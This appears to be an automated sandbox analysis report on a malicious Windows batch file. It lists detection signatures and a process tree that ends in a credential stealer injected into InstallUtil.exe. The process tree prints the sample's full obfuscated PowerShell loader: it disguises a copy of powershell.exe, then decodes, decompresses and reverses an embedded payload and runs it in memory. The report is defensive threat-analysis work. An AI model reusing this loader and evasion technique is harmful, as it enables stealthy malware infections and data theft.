Edit tour
Windows
Analysis Report
849128312.cmd
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 1848 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\84912 8312.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 5784 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - cmd.exe (PID: 7140 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - xcopy.exe (PID: 2608 cmdline:
xcopy /d / q /y /h /i C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe C :\Users\us er\Desktop \849128312 .cmd.Fjz MD5: 39FBFD3AF58238C6F9D4D408C9251FF5) - attrib.exe (PID: 7128 cmdline:
attrib +s +h C:\User s\user\Des ktop\84912 8312.cmd.F jz MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - 849128312.cmd.Fjz (PID: 6640 cmdline:
C:\Users\u ser\Deskto p\84912831 2.cmd.Fjz -WindowSty le hidden -command " $Kxrvrz = get-conten t 'C:\User s\user\Des ktop\84912 8312.cmd' | Select-O bject -Las t 1; $Rztx xaika = [S ystem.Conv ert]::From Base64Stri ng($Kxrvrz );$Jjvgcfj mzi = New- Object Sys tem.IO.Mem oryStream( , $Rztxxa ika );$Che oysx = New -Object Sy stem.IO.Me moryStream ;$Vrypedkz tmk = New- Object Sys tem.IO.Com pression.G zipStream $Jjvgcfjmz i, ([IO.Co mpression. Compressio nMode]::De compress); $Vrypedkzt mk.CopyTo( $Cheoysx );$Vrypedk ztmk.Close ();$Jjvgcf jmzi.Close ();[byte[] ] $Rztxxai ka = $Cheo ysx.ToArra y();[Array ]::Reverse ($Rztxxaik a); $Nlmpm dzvlef = [ System.App Domain]::C urrentDoma in.Load($R ztxxaika); $Hncpdnhh l = $Nlmpm dzvlef.Ent ryPoint; [ System.Del egate]::Cr eateDelega te([Action ], $Hncpdn hhl.Declar ingType, $ Hncpdnhhl. Name).Dyna micInvoke( ) | Out-Nu ll" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - stealer-CR-0110.exe (PID: 6396 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\steale r-CR-0110. exe" MD5: 0184F867DE9A072AB7F6CA3E85EB9015) - InstallUtil.exe (PID: 6020 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57) - WerFault.exe (PID: 3116 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 020 -s 114 4 MD5: C31336C1EFC2CCB44B4326EA793040F2) - InstallUtil.exe (PID: 4284 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57) - WerFault.exe (PID: 1628 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 4 284 -s 226 8 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
Click to see the 6 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |